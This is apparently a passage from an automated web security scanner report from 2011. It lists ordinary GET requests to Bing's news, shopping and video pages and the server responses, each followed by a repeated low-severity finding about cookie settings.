GET /news/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: /news P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 17:03:46 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/ Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61044 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 17:04:12 GMT Connection: close Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/search P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:52:05 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296345125; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sck HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:31 GMT Connection: close Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/
Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search?FORM=FOXSP HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /?scope=web&mkt=en-US&FORM=FOXSP P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 01:52:12 GMT Connection: close Vary: Accept-Encoding Set-Cookie: _HOP=I=1&TS=1296352332; domain=.bing.com; path=/ Set-Cookie: _SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/ Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:27 GMT Connection: close Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/ Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/
Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/search P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 01:52:13 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/content/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/healthy-cooking/r/151 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/makeup/c/4259 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/swimwear/c/4503 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/content/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/browse?mkt=en-us&vid= HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: http://www.bing.com/videos/browse P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:52:16 GMT Connection: close Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/ Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll>1=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL>1=42008 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL>1=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll>1=31036 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL>1=42008 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
